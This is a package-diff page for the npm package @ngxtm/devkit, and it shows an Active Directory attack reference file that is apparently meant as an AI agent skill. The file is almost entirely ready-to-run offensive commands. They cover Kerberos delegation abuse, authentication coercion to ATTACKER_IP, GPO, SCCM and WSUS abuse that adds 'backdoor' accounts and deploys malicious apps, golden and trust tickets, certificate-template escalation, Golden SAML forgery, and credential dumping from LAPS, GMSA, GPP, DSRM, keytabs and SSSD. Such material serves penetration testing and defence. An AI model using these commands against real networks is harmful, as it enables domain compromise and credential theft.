npm - @ngxtm/devkit - Versions diffs - 3.0.2 → 3.1.0 - Mend

@ngxtm/devkit 3.0.2 → 3.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (827) hide show

package/skills/active-directory-attacks/references/advanced-attacks.md CHANGED Viewed

@@ -1,382 +1,382 @@
-# Advanced Active Directory Attacks Reference
-## Table of Contents
-1. [Delegation Attacks](#delegation-attacks)
-2. [Group Policy Object Abuse](#group-policy-object-abuse)
-3. [RODC Attacks](#rodc-attacks)
-4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
-5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
-6. [Trust Relationship Attacks](#trust-relationship-attacks)
-7. [ADFS Golden SAML](#adfs-golden-saml)
-8. [Credential Sources](#credential-sources)
-9. [Linux AD Integration](#linux-ad-integration)
----
-## Delegation Attacks
-### Unconstrained Delegation
-When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
-**Find Delegation:**
-```powershell
-# PowerShell
-Get-ADComputer -Filter {TrustedForDelegation -eq $True}
-# BloodHound
-MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
-```
-**SpoolService Abuse:**
-```bash
-# Check spooler service
-ls \\dc01\pipe\spoolss
-# Trigger with SpoolSample
-.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
-# Or with printerbug.py
-python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
-```
-**Monitor with Rubeus:**
-```powershell
-Rubeus.exe monitor /interval:1
-```
-### Constrained Delegation
-**Identify:**
-```powershell
-Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
-```
-**Exploit with Rubeus:**
-```powershell
-# S4U2 attack
-Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
-```
-**Exploit with Impacket:**
-```bash
-getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
-```
-### Resource-Based Constrained Delegation (RBCD)
-```powershell
-# Create machine account
-New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
-# Set delegation
-Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
-# Get ticket
-.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
-```
----
-## Group Policy Object Abuse
-### Find Vulnerable GPOs
-```powershell
-Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
-```
-### Abuse with SharpGPOAbuse
-```powershell
-# Add local admin
-.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
-# Add user rights
-.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
-# Add immediate task
-.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
-```
-### Abuse with pyGPOAbuse (Linux)
-```bash
-./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
-```
----
-## RODC Attacks
-### RODC Golden Ticket
-RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
-### RODC Key List Attack
-**Requirements:**
-- krbtgt credentials of the RODC (-rodcKey)
-- ID of the krbtgt account of the RODC (-rodcNo)
-```bash
-# Impacket keylistattack
-keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
-# Using secretsdump with keylist
-secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
-```
-**Using Rubeus:**
-```powershell
-Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
-```
----
-## SCCM/WSUS Deployment
-### SCCM Attack with MalSCCM
-```bash
-# Locate SCCM server
-MalSCCM.exe locate
-# Enumerate targets
-MalSCCM.exe inspect /all
-MalSCCM.exe inspect /computers
-# Create target group
-MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
-MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
-# Create malicious app
-MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
-# Deploy
-MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
-# Force checkin
-MalSCCM.exe checkin /groupname:TargetGroup
-# Cleanup
-MalSCCM.exe app /cleanup /name:backdoor
-MalSCCM.exe group /delete /groupname:TargetGroup
-```
-### SCCM Network Access Accounts
-```powershell
-# Find SCCM blob
-Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
-# Decrypt with SharpSCCM
-.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
-```
-### WSUS Deployment Attack
-```bash
-# Using SharpWSUS
-SharpWSUS.exe locate
-SharpWSUS.exe inspect
-# Create malicious update
-SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
-# Deploy to target
-SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
-# Check status
-SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
-# Cleanup
-SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
-```
----
-## AD Certificate Services (ADCS)
-### ESC1 - Misconfigured Templates
-Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
-```bash
-# Find vulnerable templates
-certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
-# Request certificate as admin
-certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
-# Authenticate
-certipy auth -pfx administrator.pfx -dc-ip DC_IP
-```
-### ESC4 - ACL Vulnerabilities
-```python
-# Check for WriteProperty
-python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
-# Add ENROLLEE_SUPPLIES_SUBJECT flag
-python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
-# Perform ESC1, then restore
-python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
-```
-### ESC8 - NTLM Relay to Web Enrollment
-```bash
-# Start relay
-ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
-# Coerce authentication
-python3 petitpotam.py ATTACKER_IP DC_IP
-# Use certificate
-Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
-```
-### Shadow Credentials
-```bash
-# Add Key Credential (pyWhisker)
-python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
-# Get TGT with PKINIT
-python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
-# Get NT hash
-export KRB5CCNAME=target.ccache
-python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
-```
----
-## Trust Relationship Attacks
-### Child to Parent Domain (SID History)
-```powershell
-# Get Enterprise Admins SID from parent
-$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
-# Create Golden Ticket with SID History
-kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
-```
-### Forest to Forest (Trust Ticket)
-```bash
-# Dump trust key
-lsadump::trust /patch
-# Forge inter-realm TGT
-kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
-# Use trust ticket
-.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
-```
----
-## ADFS Golden SAML
-**Requirements:**
-- ADFS service account access
-- Token signing certificate (PFX + decryption password)
-```bash
-# Dump with ADFSDump
-.\ADFSDump.exe
-# Forge SAML token
-python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
-```
----
-## Credential Sources
-### LAPS Password
-```powershell
-# PowerShell
-Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
-# CrackMapExec
-crackmapexec ldap DC_IP -u user -p password -M laps
-```
-### GMSA Password
-```powershell
-# PowerShell + DSInternals
-$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
-$mp = $gmsa.'msDS-ManagedPassword'
-ConvertFrom-ADManagedPasswordBlob $mp
-```
-```bash
-# Linux with bloodyAD
-python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
-```
-### Group Policy Preferences (GPP)
-```bash
-# Find in SYSVOL
-findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
-# Decrypt
-python3 Get-GPPPassword.py -no-pass 'DC_IP'
-```
-### DSRM Credentials
-```powershell
-# Dump DSRM hash
-Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
-# Enable DSRM admin logon
-Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
-```
----
-## Linux AD Integration
-### CCACHE Ticket Reuse
-```bash
-# Find tickets
-ls /tmp/ | grep krb5cc
-# Use ticket
-export KRB5CCNAME=/tmp/krb5cc_1000
-```
-### Extract from Keytab
-```bash
-# List keys
-klist -k /etc/krb5.keytab
-# Extract with KeyTabExtract
-python3 keytabextract.py /etc/krb5.keytab
-```
-### Extract from SSSD
-```bash
-# Database location
-/var/lib/sss/secrets/secrets.ldb
-# Key location
-/var/lib/sss/secrets/.secrets.mkey
-# Extract
-python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
-```
+# Advanced Active Directory Attacks Reference
+## Table of Contents
+1. [Delegation Attacks](#delegation-attacks)
+2. [Group Policy Object Abuse](#group-policy-object-abuse)
+3. [RODC Attacks](#rodc-attacks)
+4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
+5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
+6. [Trust Relationship Attacks](#trust-relationship-attacks)
+7. [ADFS Golden SAML](#adfs-golden-saml)
+8. [Credential Sources](#credential-sources)
+9. [Linux AD Integration](#linux-ad-integration)
+---
+## Delegation Attacks
+### Unconstrained Delegation
+When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
+**Find Delegation:**
+```powershell
+# PowerShell
+Get-ADComputer -Filter {TrustedForDelegation -eq $True}
+# BloodHound
+MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
+```
+**SpoolService Abuse:**
+```bash
+# Check spooler service
+ls \\dc01\pipe\spoolss
+# Trigger with SpoolSample
+.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
+# Or with printerbug.py
+python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
+```
+**Monitor with Rubeus:**
+```powershell
+Rubeus.exe monitor /interval:1
+```
+### Constrained Delegation
+**Identify:**
+```powershell
+Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
+```
+**Exploit with Rubeus:**
+```powershell
+# S4U2 attack
+Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+**Exploit with Impacket:**
+```bash
+getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
+```
+### Resource-Based Constrained Delegation (RBCD)
+```powershell
+# Create machine account
+New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
+# Set delegation
+Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
+# Get ticket
+.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+---
+## Group Policy Object Abuse
+### Find Vulnerable GPOs
+```powershell
+Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
+```
+### Abuse with SharpGPOAbuse
+```powershell
+# Add local admin
+.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
+# Add user rights
+.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
+# Add immediate task
+.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
+```
+### Abuse with pyGPOAbuse (Linux)
+```bash
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
+```
+---
+## RODC Attacks
+### RODC Golden Ticket
+RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
+### RODC Key List Attack
+**Requirements:**
+- krbtgt credentials of the RODC (-rodcKey)
+- ID of the krbtgt account of the RODC (-rodcNo)
+```bash
+# Impacket keylistattack
+keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
+# Using secretsdump with keylist
+secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
+```
+**Using Rubeus:**
+```powershell
+Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
+```
+---
+## SCCM/WSUS Deployment
+### SCCM Attack with MalSCCM
+```bash
+# Locate SCCM server
+MalSCCM.exe locate
+# Enumerate targets
+MalSCCM.exe inspect /all
+MalSCCM.exe inspect /computers
+# Create target group
+MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
+MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
+# Create malicious app
+MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
+# Deploy
+MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
+# Force checkin
+MalSCCM.exe checkin /groupname:TargetGroup
+# Cleanup
+MalSCCM.exe app /cleanup /name:backdoor
+MalSCCM.exe group /delete /groupname:TargetGroup
+```
+### SCCM Network Access Accounts
+```powershell
+# Find SCCM blob
+Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
+# Decrypt with SharpSCCM
+.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
+```
+### WSUS Deployment Attack
+```bash
+# Using SharpWSUS
+SharpWSUS.exe locate
+SharpWSUS.exe inspect
+# Create malicious update
+SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
+# Deploy to target
+SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+# Check status
+SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
+# Cleanup
+SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+```
+---
+## AD Certificate Services (ADCS)
+### ESC1 - Misconfigured Templates
+Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
+# Request certificate as admin
+certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
+# Authenticate
+certipy auth -pfx administrator.pfx -dc-ip DC_IP
+```
+### ESC4 - ACL Vulnerabilities
+```python
+# Check for WriteProperty
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
+# Add ENROLLEE_SUPPLIES_SUBJECT flag
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+# Perform ESC1, then restore
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
+```
+### ESC8 - NTLM Relay to Web Enrollment
+```bash
+# Start relay
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+# Coerce authentication
+python3 petitpotam.py ATTACKER_IP DC_IP
+# Use certificate
+Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
+```
+### Shadow Credentials
+```bash
+# Add Key Credential (pyWhisker)
+python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
+# Get TGT with PKINIT
+python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
+# Get NT hash
+export KRB5CCNAME=target.ccache
+python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
+```
+---
+## Trust Relationship Attacks
+### Child to Parent Domain (SID History)
+```powershell
+# Get Enterprise Admins SID from parent
+$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
+# Create Golden Ticket with SID History
+kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
+```
+### Forest to Forest (Trust Ticket)
+```bash
+# Dump trust key
+lsadump::trust /patch
+# Forge inter-realm TGT
+kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
+# Use trust ticket
+.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
+```
+---
+## ADFS Golden SAML
+**Requirements:**
+- ADFS service account access
+- Token signing certificate (PFX + decryption password)
+```bash
+# Dump with ADFSDump
+.\ADFSDump.exe
+# Forge SAML token
+python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
+```
+---
+## Credential Sources
+### LAPS Password
+```powershell
+# PowerShell
+Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
+# CrackMapExec
+crackmapexec ldap DC_IP -u user -p password -M laps
+```
+### GMSA Password
+```powershell
+# PowerShell + DSInternals
+$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
+$mp = $gmsa.'msDS-ManagedPassword'
+ConvertFrom-ADManagedPasswordBlob $mp
+```
+```bash
+# Linux with bloodyAD
+python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
+```
+### Group Policy Preferences (GPP)
+```bash
+# Find in SYSVOL
+findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
+# Decrypt
+python3 Get-GPPPassword.py -no-pass 'DC_IP'
+```
+### DSRM Credentials
+```powershell
+# Dump DSRM hash
+Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
+# Enable DSRM admin logon
+Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
+```
+---
+## Linux AD Integration
+### CCACHE Ticket Reuse
+```bash
+# Find tickets
+ls /tmp/ | grep krb5cc
+# Use ticket
+export KRB5CCNAME=/tmp/krb5cc_1000
+```
+### Extract from Keytab
+```bash
+# List keys
+klist -k /etc/krb5.keytab
+# Extract with KeyTabExtract
+python3 keytabextract.py /etc/krb5.keytab
+```
+### Extract from SSSD
+```bash
+# Database location
+/var/lib/sss/secrets/secrets.ldb
+# Key location
+/var/lib/sss/secrets/.secrets.mkey
+# Extract
+python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
+```